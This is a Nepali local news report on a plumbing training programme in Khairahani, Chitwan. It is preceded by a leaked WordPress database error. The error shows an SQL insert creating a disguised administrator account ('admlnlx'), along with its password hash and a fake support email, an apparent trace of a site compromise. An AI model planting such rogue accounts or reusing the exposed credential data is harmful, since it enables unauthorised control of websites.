WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BuWJhHCVHfcIYHut.siZO5aqHuh.oG/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 09:37:20', '', 'admlnlx', 'admlnlx')
चितवन,माघ २४-
खैरहनी नगरपालिका १६ मा रहेको पिद्रहनीमा आज सोमबार बाट आधारभुत प्लम्बिङ्ग तालिम सञ्चालन भएको छ ।
खैरहनी नगरपालिकाका कार्यकारी अधिकृत गंगा बहादुर भुजेलको प्रमुख आतिथ्यमा भएको कार्यक्रममा उहाले ब्यानर निकालेर तालिमको उदघाटन गर्नु भएको थियो । तालिमा ३० जना प्रशिक्षार्थी सहभागी रहेका थिए । तालिम ३ महिना सम्म सञ्चालन हुने र तालिमा ८० प्रतिशत प्रयोगात्मक र २० प्रतिशत सैदान्तिक हुने तालिमका प्रशिक्षक नमराज पौडेलले जानकारी दिए ।
तालिमा खैरहनी उद्योग बाणिज्य सघंका उपाध्यक्ष कमला देबी श्रेष्ठ, सयुत बडा १४,१५,१६ का सचिब कङ बहादुर भुजेल, नेपाली काग्रेस खैरहनी नगर सदस्य चन्द्रकान्त न्यौपाने, खैरहनी १६ का बडा नागरिक मञ्चका अध्यक्ष प्रेम बहादुर थापा, महिला जिल्ला समनय समितिका उपाध्यक्ष सुसिला उप्रेती, खैरहनी स्वास्थ्य सोएमसेबीका गोमा देबी भुजेल, खगेन्द्र मली उथान समाजका अध्यक्ष सुक बहादुर तामाङ, चितवन सामुदायक मेल मिलाप कर्ता कशोक अधिकारी, लगायतले मन्तब्य राखेका थिए ।
कार्यक्रम उपासना बचत तथा ऋण सहकारी सस्थाका अध्यक्ष कृष्ण बहादुर गरुङको अध्यक्षातामा सम्पन्न भएको थियो ।